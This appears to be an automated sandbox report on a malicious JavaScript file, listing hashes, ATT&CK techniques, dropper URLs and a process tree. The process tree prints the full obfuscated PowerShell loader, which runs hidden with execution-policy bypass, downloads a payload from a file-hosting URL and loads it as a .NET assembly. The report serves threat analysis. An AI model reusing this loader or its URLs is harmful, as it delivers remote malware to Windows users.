0844465dfa8bb241f452c320bc6caf6cec645b461dbcd468a2afc9dc900e595c

General

Target

uPh2C.js
Size

58KB
MD5

705e54950f28c565dbe4818eb2be7423
SHA1

19ff36dbb676a64197e0a645adf317d2b9cc17d3
SHA256

0844465dfa8bb241f452c320bc6caf6cec645b461dbcd468a2afc9dc900e595c
SHA512

cc9b21272ba9a2fa038a82c8206303575ce9374f1275b9c394407828c475789616e914befecf58e25c94d451fa92d5a313a611188516b4120015846dac56288f
SSDEEP

1536:a0vDHXpEjO9Xwq2Sk6e2Nhxdd5pdLv+l/4QmuWOMP3HXpEjO9Xwq2Sk6e2Nhxddi:aoDHXp+q62Nhxdd5pdq61HXp+q62Nhx6

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2788	powershell.exe
6	2788	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
320	powershell.exe
2788	powershell.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
320	powershell.exe
2788	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	320	powershell.exe
Token: SeDebugPrivilege	2788	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 588 wrote to memory of 320	588	wscript.exe	31
PID 588 wrote to memory of 320	588	wscript.exe	31
PID 588 wrote to memory of 320	588	wscript.exe	31
PID 320 wrote to memory of 2788	320	powershell.exe	33
PID 320 wrote to memory of 2788	320	powershell.exe	33
PID 320 wrote to memory of 2788	320	powershell.exe	33

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\uPh2C.js
1⤵
- Suspicious use of WriteProcessMemory
PID:588
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAgACgAIAAkAEUATgBWADoAQwBvAG0AcwBQAEUAQwBbADQALAAxADUALAAyADUAXQAtAEoATwBpAG4AJwAnACkAIAAoACAAKAAnAEgATAAxAGkAbQBhAGcAZQBVAHIAbAAgAD0AIABPAEoAMABoAHQAdABwAHMAOgAvAC8AMQAwADEANwAuAGYAaQBsAGUAbQBhAGkAbAAuAGMAbwBtAC8AYQBwAGkALwAnACsAJwBmAGkAbABlAC8AZwBlAHQAPwBmAGkAbABlAGsAZQB5AD0AMgBBAGEAXwAnACsAJwBiAFcAbwA5AFIAZQB1ADQANQB0ADcAQgBVADEAawBWAGcAJwArACcAcwBkACcAKwAnADkAcABUADkAcABnAFMAUwBsAHYAUwB0AEcAcgBuAFQASQAnACsAJwBDAGYARgBoAG0AVABLAGoAMwBMAEMANgBTAFEAdABJAGMATwBjAF8AVAAzADUAdwAmAHAAawBfAHYAaQBkAD0AZgBkADQAZgA2ADEANABiAGIAMgAwADkAYwA2ADIAYwAxADcAMwAwADkANAA1ADEANwA2AGEAMAA5ADAANABmACAATwBKADAAOwBIACcAKwAnAEwAMQB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsASABMADEAaQBtAGEAZwBlAEIAeQB0AGUAcwAgAD0AIABIAEwAMQB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgASABMADEAaQBtAGEAZwBlAFUAcgBsACkAOwBIAEwAMQBpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABIAEwAMQBpAG0AYQBnAGUAQgB5AHQAZQBzACkAOwBIAEwAMQBzAHQAYQByAHQARgBsAGEAZwAgAD0AIABPAEoAMAA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+AE8ASgAwADsASABMADEAJwArACcAZQBuAGQARgBsAGEAZwAgAD0AIABPAEoAMAA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4ATwBKADAAOwBIAEwAMQBzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgAEgATAAxAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AJwArACcAZgAoAEgATAAxAHMAdABhAHIAdABGAGwAYQBnACkAOwBIAEwAMQBlAG4AZABJAG4AZABlAHgAIAA9ACAASABMADEAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgASABMADEAZQBuAGQARgBsAGEAZwApADsASABMADEAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIABIAEwAMQBlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgAEgATAAnACsAJwAxAHMAdABhAHIAdABJAG4AZABlAHgAOwBIAEwAMQBzAHQAYQByAHQAJwArACcASQBuAGQAZQB4ACAAKwA9ACAASABMADEAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7AEgATAAxAGIAJwArACcAYQBzAGUANgA0AEwAZQBuAGcAdABoACcAKwAnACAAPQAgAEgATAAxACcAKwAnAGUAbgBkAEkAbgBkAGUAeAAgAC0AIABIACcAKwAnAEwAMQBzAHQAYQByAHQASQBuAGQAZQB4ADsASABMADEAYgAnACsAJwBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAgAD0AIABIAEwAMQBpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgASABMADEAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAASABMADEAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAKQA7AEgATAAxAGIAYQBzAGUANgA0AFIAZQB2AGUAcgBzAGUAZAAgAD0AIAAtAGoAbwBpAG4AIAAoAEgATAAxAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQALgAnACsAJwBUAG8AQwBoAGEAcgBBAHIAcgBhAHkAKAApACAASQBPAEUAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACAASABMADEAXwAgAH0AKQBbAC0AMQAuAC4ALQAoAEgATAAxAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQALgBMAGUAbgBnAHQAaAApAF0AOwBIAEwAMQBjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgASABMADEAYgBhAHMAZQA2ADQAUgBlAHYAZQByAHMAZQBkACkAOwBIAEwAMQBsAG8AYQAnACsAJwBkAGUAJwArACcAZABBAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEgATAAxAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQAnACsAJwBzACkAOwBIAEwAMQB2AGEAaQBNAGUAdABoAG8AZAAgAD0AIABbAGQAbgBsAGkAYgAuAEkATwAuAEgAbwBtAGUAXQAuAEcAZQB0AE0AZQB0AGgAbwBkACgATwBKADAAVgBBACcAKwAnAEkATwBKADAAKQA7AEgATAAxAHYAYQBpAE0AZQB0AGgAbwBkAC4ASQBuAHYAbwBrAGUAKABIAEwAMQBuAHUAbABsACwAJwArACcAIABAACgATwBKADAAMAAvAHQAUQA5AEgAMQAvAGQALwBlAGUALgBlAHQAcwBhAHAALwAvADoAcwBwAHQAdABoAE8ASgAwACwAIABPAEoAMABkAGUAcwBhAHQAaQB2AGEAZABvAE8ASgAwACwAIAAnACsAJwBPAEoAMABkAGUAcwBhAHQAaQB2AGEAZABvAE8ASgAwACwAIABPAEoAMABkAGUAcwBhACcAKwAnAHQAaQB2AGEAZABvAE8ASgAwACwAIABPAEoAMABNAFMAQgB1AGkAbABkAE8ASgAwACwAIABPAEoAMABkAGUAcwAnACsAJwBhAHQAaQB2AGEAZABvAE8ASgAwACwAJwArACcAIABPAEoAMABkAGUAcwBhAHQAaQB2AGEAZABvAE8ASgAwACwATwBKADAAZABlAHMAYQB0AGkAdgBhAGQAbwBPAEoAMAAsAE8ASgAwAGQAZQBzAGEAdABpAHYAYQBkAG8ATwBKADAALABPAEoAMABkAGUAcwBhAHQAaQB2AGEAZABvAE8ASgAwACwATwBKADAAZABlAHMAYQB0AGkAdgBhAGQAbwBPAEoAMAAsAE8ASgAwAGQAZQBzAGEAdABpAHYAYQBkAG8ATwBKADAALABPACcAKwAnAEoAMAAxAE8ASgAwACwATwBKADAAZABlAHMAYQB0AGkAdgBhAGQAbwBPAEoAMAApACkAOwAnACkALgBSAGUAcABsAEEAQwBFACgAKABbAGMASABBAHIAXQA3ADMAKwBbAGMASABBAHIAXQA3ADkAKwBbAGMASABBAHIAXQA2ADkAKQAsACcAfAAnACkALgBSAGUAcABsAEEAQwBFACgAKABbAGMASABBAHIAXQA3ADIAKwBbAGMASABBAHIAXQA3ADYAKwBbAGMASABBAHIAXQA0ADkAKQAsAFsAUwBUAHIAaQBuAGcAXQBbAGMASABBAHIAXQAzADYAKQAuAFIAZQBwAGwAQQBDAEUAKAAoAFsAYwBIAEEAcgBdADcAOQArAFsAYwBIAEEAcgBdADcANAArAFsAYwBIAEEAcgBdADQAOAApACwAWwBTAFQAcgBpAG4AZwBdAFsAYwBIAEEAcgBdADMAOQApACkA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:320
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENV:ComsPEC[4,15,25]-JOin'') ( ('HL1imageUrl = OJ0https://1017.filemail.com/api/'+'file/get?filekey=2Aa_'+'bWo9Reu45t7BU1kVg'+'sd'+'9pT9pgSSlvStGrnTI'+'CfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f OJ0;H'+'L1webClient = New-Object System.Net.WebClient;HL1imageBytes = HL1webClient.DownloadData(HL1imageUrl);HL1imageText = [System.Text.Encoding]::UTF8.GetString(HL1imageBytes);HL1startFlag = OJ0<<BASE64_START>>OJ0;HL1'+'endFlag = OJ0<<BASE64_END>>OJ0;HL1startIndex = HL1imageText.IndexO'+'f(HL1startFlag);HL1endIndex = HL1imageText.IndexOf(HL1endFlag);HL1startIndex -ge 0 -and HL1endIndex -gt HL'+'1startIndex;HL1start'+'Index += HL1startFlag.Length;HL1b'+'ase64Length'+' = HL1'+'endIndex - H'+'L1startIndex;HL1b'+'ase64Command = HL1imageText.Substring(HL1startIndex, HL1base64Length);HL1base64Reversed = -join (HL1base64Command.'+'ToCharArray() IOE ForEach-Object { HL1_ })[-1..-(HL1base64Command.Length)];HL1commandBytes = [System.Convert]::FromBase64String(HL1base64Reversed);HL1loa'+'de'+'dAssembly = [System.Reflection.Assembly]::Load(HL1commandByte'+'s);HL1vaiMethod = [dnlib.IO.Home].GetMethod(OJ0VA'+'IOJ0);HL1vaiMethod.Invoke(HL1null,'+' @(OJ00/tQ9H1/d/ee.etsap//:sptthOJ0, OJ0desativadoOJ0, '+'OJ0desativadoOJ0, OJ0desa'+'tivadoOJ0, OJ0MSBuildOJ0, OJ0des'+'ativadoOJ0,'+' OJ0desativadoOJ0,OJ0desativadoOJ0,OJ0desativadoOJ0,OJ0desativadoOJ0,OJ0desativadoOJ0,OJ0desativadoOJ0,O'+'J01OJ0,OJ0desativadoOJ0));').ReplACE(([cHAr]73+[cHAr]79+[cHAr]69),'|').ReplACE(([cHAr]72+[cHAr]76+[cHAr]49),[STring][cHAr]36).ReplACE(([cHAr]79+[cHAr]74+[cHAr]48),[STring][cHAr]39))"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2788

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
d114a41cac1370683f888b468f01ece0

SHA1
ecf7274af68f7a113ac8bb72c04c8cd4c0c64e69

SHA256
1245f65d9f0f7f646797d155c5eae65578e72e231006d23b2a0468a919fa6546

SHA512
1b5355ccc8ecc8157ed76fdfafc5b8ea8aa76aaf41c3b92d53b5ee4301e8bc244272d51c08491e53dbf2d7adce259d6a11b51651322f8441104af7b40f179e71

Download Submit
memory/320-4-0x000007FEF5FBE000-0x000007FEF5FBF000-memory.dmp

Filesize
4KB

Download
memory/320-5-0x000000001B720000-0x000000001BA02000-memory.dmp

Filesize
2.9MB

Download
memory/320-6-0x00000000021D0000-0x00000000021D8000-memory.dmp

Filesize
32KB

Download
memory/320-13-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp

Filesize
9.6MB

Download
memory/320-12-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp

Filesize
9.6MB

Download
memory/320-14-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing